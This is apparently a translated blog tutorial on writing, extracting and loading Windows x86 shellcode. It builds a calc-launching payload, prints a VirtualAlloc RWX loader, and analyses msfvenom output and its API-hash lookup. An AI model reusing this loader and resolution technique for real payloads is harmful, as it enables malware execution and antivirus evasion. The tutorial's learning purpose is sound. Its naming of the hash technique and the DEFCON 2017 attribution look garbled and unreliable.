When I first started in the industry, I saw all sorts of shellcode flying around. Looking at these binary codes and also at the Neo poster of The Matrix on the wall, my heart gradually yearned for it. Shellcode is quite flexible and is often used in anti-anti-virus and vulnerability exploitation. So, how do we extract and load a shellcode, and how does msf implement shellcode?
0x01 Shellcode Basics
Shellcode is hexadecimal machine code. Below, we will further understand what shellcode is by looking at a simple code that opens the calculator Calc.exe.

#include "stdafx.h"
#include
int main(int argc, char* argv[])
{
WinExec("calc",1);
return 0;
}
A particularly simple code, calling the Windows API WinExec to open the calculator, and then we will see it in OD dynamic debugging.
push 0x1 ; In x86, parameters are passed by pushing values onto the stack, pushing 1 onto the stack, which is the parameter 1 in WinExec("calc",1)
push OpenCalc.00406030 ; Push the address storing the 'calc' string onto the stack, which is also a parameter
call dword ptr ds:[<&KERNEL32.WinExec>] ; Call WinExec under KERNEL32
Brings up the problem
We will underline the machine code of these three sentences, and express it in C language as "\x6A\x01\x68\x30\x60\x40\x00\xFF\x15\x00\x50\x40\x00", which is also the shellcode string I often see. If we load this string into memory, can it run successfully, I'm afraid not, because we cannot guarantee that the address 0x406030 of every program stores the calc string, nor can we guarantee that 0x405000 in the import table is the WinExec address.
0x02 Write a simple shellcode
Then, the little Ming who has many questions will ask, if we pass the calc string directly and write a fixed WinExec address, can it run on the host in the current environment? Let's try, let's try.
Firstly, construct a calc string
xor ecx, ecx ; Set ecx to zero
push ecx ; Push the value of ecx onto the stack, acting as the string terminator \x00
push 0x636c6163 ; clac (calc little-endian)
mov eax, esp ; Save the stack top pointer pointing to calc\x00 to eax
**Get Kernel32 WinExec Address**
There are two methods to obtain the address, one is through dynamic debugging, and the other is through GetProcAddress.
Method one:
Select or right-click and follow the data window to obtain the WinExec address.
Method two:
#include "stdafx.h"
#include <windows.h>
typedef int (__cdecl *MYPROC)(LPTSTR);
int main() {
HINSTANCE Kernel32Addr;
MYPROC WinExecAddr;
Kernel32Addr = GetModuleHandle("kernel32.dll");
printf("KERNEL32 address in memory: 0x%08p\n", Kernel32Addr);
WinExecAddr = (MYPROC)GetProcAddress(Kernel32Addr, "WinExec");
printf("WinExec address in memory is: 0x%08p\n", WinExecAddr );
getchar();
return 0;
}
Construct the complete assembly code
section .data
section .bss
section .text
global _start
_start:
xor ecx, ecx ; Set ecx to zero
push ecx ; Push the value of ecx onto the stack, acting as the string terminator \x00
push 0x636c6163 ; clac (calc little-endian)
mov eax, esp ; Save the stack top pointer pointing to calc\x00 to eax
inc ecx ; Set ecx to 1
push ecx ; Push the second parameter 1
push eax ; Push the stack, eax points to calc\x00
mov ebx, 0x7c86250d ; Save the address of WinExec to ebx
call ebx ; Execute WinExec
Save the above file as xxx.asm, if Windows does not have a compilation environment, you can directly compile it on Kali, the command is as follows
nasm -f elf32 -o xxx.o xxx.asm
ld -m elf_i386 -o xxx xxx.o
Then read the file through objdump -d xxx and print it in C format, the command is as follows
objdump -M intel -d xxx | grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
In this way, we smoothly obtain our shellcode
Load the shellcode
#include "stdafx.h"
#include <windows.h>
unsigned char shellcode[] =
"\x31\xc9\x51\x68\x63\x61\x6c\x63\x89\xe0\x41\x51\x50\xbb\x0d\x25\x86\x7c\xff\xd3\x59";
int main(int argc, char* argv[])
{
// Save the shellcode to memory for loading
void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}
Compile and run.
Successfully popped the calculator, proving that Xiao Ming's conjecture is feasible. Then, with many questions in mind, Xiao Ming asked, 'What use is there in this hardcoded address, which can only operate on itself?' Let's take a look at how msf's shellcode implements functionality on different machines.
0x03 Analyze msf's shellcode
We analyze the msf shellcode from a reverse engineering perspective, first we output the shellcode with the same functionality as the previous text using an msfvenom command.
msfvenom -p windows/exec cmd=calc.exe -f c
Compile our loader and perform reverse engineering on it.
#include "stdafx.h"
#include <windows.h>
// msf shellcode
unsigned char shellcode[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
int main(int argc, char* argv[])
{
void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}
The author uses OD debugging to report errors and switches to windbg for dynamic debugging.
0x401000 is the main function (the initial address of the code segment), where we load the code, allocate memory space through virtualAlloc, and place the memory address in eax, which is 0x003A0000. Through memcpy, the shellcode variable stored in the .data segment is placed at 0x003A0000, and then called.
Let's take a look inside and find that the shellcode has already been copied into memory, and our shellcode can run normally. I have commented on the function of each assembly step.
The general process can be decomposed into:
1. Obtain the string 'calc.exe' at the end of the shellcode by using the hardcoded offset 0x82, then push parameter 1 and calc.exe onto the stack, as well as the winexec API hash 876F8B31
2. Loop through the PEB table to get the base address of the module
3. Parse the PE file, skip if there is no export table, and continue with step 2
4. Parse the export table, skip if the number of export tables is 0, and continue with step 2
5. Traverse the export name table to calculate the hash based on the export names, and find the corresponding function, which is WinExec
6. If the function cannot be found, find the next module information through the linked list and continue with step 2
7. Find winExec and execute the function
What is particularly interesting inside is the use of an API hash to find function addresses, a technology called SFHA (Stephen Fewer's Hash AI), which was the subject of a special lecture at DEFCON in 2017.
0x04 Summary
The road to the mountain of books is paved with diligence, and the sea of learning has no end but is navigated by hard work as a boat. It still requires a lot of code debugging to deepen understanding.

评论已关闭